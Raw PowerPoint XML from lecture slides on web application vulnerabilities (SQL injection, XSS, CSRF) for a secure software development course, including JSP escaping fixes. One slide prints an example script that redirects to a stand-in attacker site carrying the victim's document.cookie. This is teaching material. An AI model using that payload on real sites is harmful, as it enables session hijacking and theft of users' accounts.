              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId5" imgW="2895238" imgH="1523810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196975"/>
                        <a:ext cx="2817813" cy="1482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0981" name="Object 5" descr="xss attack input on the url address to exploit reflected xss.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395767049"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="3733800"/>
          <a:ext cx="3659188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" name="Bitmap Image" r:id="rId7" imgW="3761905" imgH="828791" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId7" imgW="3761905" imgH="828791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3733800"/>
                        <a:ext cx="3659188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0985" name="Object 9" descr="the pop up dialog means the portal is vulnerable to xss.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515347948"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="4267200"/>
          <a:ext cx="2333625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5" name="Bitmap Image" r:id="rId9" imgW="1961905" imgH="1181265" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId9" imgW="1961905" imgH="1181265" progId="PBrush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4267200"/>
                        <a:ext cx="2333625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0982" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2667000"/>
            <a:ext cx="4064000" cy="64633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(b) The web page displays a greeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510983" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="288925" y="5260975"/>
            <a:ext cx="4278313" cy="64633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(c) Replace the value of username with JavaScript code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510984" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2667000"/>
            <a:ext cx="4243388" cy="64633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(a) Website offers personalized views based on username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4567238" y="3657600"/>
            <a:ext cx="4576762" cy="153272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fr-FR" sz="1800" dirty="0"/>
              <a:t>(d) An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>sends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> user cookie to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>attacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>&lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> = http://attackerweb.com/steal.cgi? + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> &lt;/SCRIPT&gt;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4969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0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0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1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51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982" grpId="0"/>
      <p:bldP spid="510983" grpId="0"/>
      <p:bldP spid="510984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10600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS vulnerable code and fixing example: JSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="An example of stored xss in jsp code where an employee id information being fetched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40386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2162344"/>
            <a:ext cx="4572000" cy="8402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Reads an employee ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, from an HTTP request and displays it to the user without sanitizing for meta characters.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2349605" y="35814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Employee ID:  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c:out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}" /&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee ID: "${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fn:escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)}"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="488792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Preventing XSS by encoding HTML special characters in JSTL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35503630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610600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS vulnerable code example: JSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Picture 3" descr="A sql query vulnerable to xss attack.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219200"/>
            <a:ext cx="49720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28800" y="3048000"/>
            <a:ext cx="5638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Querying a database table for a given ID and prints employee's name without filtering HTML or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> meta characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848322" y="42672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Employee Name:  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c:out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="${name}" /&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee ID: "${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fn:escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(name)}"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1933575" y="5334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dirty="0"/>
              <a:t>Preventing XSS by encoding HTML special characters in JSTL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24305140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0"/>
            <a:ext cx="7239000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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1000" y="945931"/>
            <a:ext cx="8469086" cy="5302469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dirty="0"/>
              <a:t>[1] W. Halfond, J. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Viegas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, and A. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Orso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, “A Classification of SQL-Injection Attacks and Countermeasures,” Proc. of International </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Symp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. on Secure Software Engineering , Virginia, USA, March 2006.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dirty="0"/>
              <a:t>[2] Cross Site Scripting, http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)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dirty="0"/>
              <a:t>[3] Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>BookStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Web Application, http://www.gotocode.com/apps.asp?app_id=3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1600" dirty="0"/>
              <a:t>[4] JSP Blog, http://jspblog.sourceforge.net/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>[5] OWASP XSS, https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>[6] OWASAP CSRF, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1300540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5461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Information deletion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 4" descr="im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914400"/>
            <a:ext cx="7467600" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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609600" y="4387264"/>
            <a:ext cx="8077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/>
              <a:t>“The existence of an SQL injection attack on the RIAA's site came to light via social network news site … hackers turned the site into a blank slate, among other things.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" dirty="0"/>
              <a:t>“The RIAA has restored RIAA.org, although whether it's any more secure than before remains open to question” </a:t>
            </a:r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1295400" y="5852527"/>
            <a:ext cx="6085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dirty="0">
                <a:latin typeface="Tempus Sans ITC" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Source: http://www.theregister.co.uk/2008/01/21/riaa_hacktivism/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741996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9144000" cy="5461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sz="3200" dirty="0"/>
              <a:t>More list of incidents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3400" y="990600"/>
            <a:ext cx="8077200" cy="5054600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (CVE) http://cve.mitre.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web-Application Security Consortium (WASC) http://www.webappsec.org/projects/whid/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Outcome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="18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66490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/>
              <a:t>A snapshot of web security attack types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="8382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Some common attacks are due to application vulnerabilities such as SQL injection and Cross-Site Scripting. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="Top web attack method results from webappsec.org. The top one is SQL injection, followed by denial of service and XSS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9" y="1600200"/>
            <a:ext cx="8043862" cy="434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4800" y="5867400"/>
            <a:ext cx="883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err="1"/>
              <a:t>Src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3469369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3268" y="152400"/>
            <a:ext cx="8489732" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Vulnerability trend (SQLI and XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="6009289"/>
            <a:ext cx="7162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>
                <a:latin typeface="Tempus Sans ITC" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Source: cve.mitre.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Chart 8" descr="Vulnerability trend from 2014-2019. for sql injection and xss.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0769898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="236652" y="909144"/>
          <a:ext cx="8670696" cy="49661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36653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534400" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Web application code-level security vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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998483"/>
            <a:ext cx="8305800" cy="479271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400" dirty="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are flaws in applications that allow attackers to expose or alter sensitive information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Exploitation of vulnerabilities are attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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Common example of vulnerabilities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SQL Injection (SQLI)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Cross-Site Scripting (XSS)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/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616817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SQL Injection (SQLI) vulnerabilities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r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SQL queries generated in applications with user inputs may not be sanitized properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The intended structure of SQL queries are altered during application runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authentication bypassing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Leakage of private information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605454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"/>
            <a:ext cx="8991600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Legitimate access to an account (step 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 2" descr="A login for bookstore using admin/admin as valid user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007" y="733425"/>
            <a:ext cx="8171793" cy="477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17715" y="5848290"/>
            <a:ext cx="87847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00CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BookStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, http://gotocode.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2877483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</TotalTime>
  <Words>1250</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>151</Paragraphs>
  <Slides>29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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tempus Sans ITC</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Bitmap Image</vt:lpstr>
      <vt:lpstr>Web Application Vulnerability and Mitigation </vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Information deletion</vt:lpstr>
      <vt:lpstr>More list of incidents</vt:lpstr>
      <vt:lpstr>A snapshot of web security attack types</vt:lpstr>
      <vt:lpstr>Vulnerability trend (SQLI and XSS)</vt:lpstr>
      <vt:lpstr>Web application code-level security vulnerability</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLI) vulnerabilities</vt:lpstr>
      <vt:lpstr>Legitimate access to an account (step 1)</vt:lpstr>
      <vt:lpstr>Legitimate access to an account (step 2)</vt:lpstr>
      <vt:lpstr>Access to an account through SQL Injection (step 1)</vt:lpstr>
      <vt:lpstr>Access through an SQL Injection attack (step 2)</vt:lpstr>
      <vt:lpstr>Example of code with vulnerability</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection attack classification</vt:lpstr>
      <vt:lpstr>Challenges of SQLI attack detection approaches</vt:lpstr>
      <vt:lpstr>Test case generation: Attack signature</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) vulnerabilities</vt:lpstr>
      <vt:lpstr>Posting a benign comment (step 1)</vt:lpstr>
      <vt:lpstr>Viewing a benign comment (step 2)</vt:lpstr>
      <vt:lpstr>Posting a malicious comment (step 1)</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment (step 2)</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment (step 3)</vt:lpstr>
      <vt:lpstr>Posting a malicious script to steal cookie</vt:lpstr>
      <vt:lpstr>XSS attack types</vt:lpstr>
      <vt:lpstr>A reflected XSS attack example</vt:lpstr>
      <vt:lpstr>XSS vulnerable code and fixing example: JSP</vt:lpstr>
      <vt:lpstr>XSS vulnerable code example: JSP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CS4550: Secure Software Development</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>59</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-01T18:36:58Z</dcterms:modified>
</cp:coreProperties>
</file>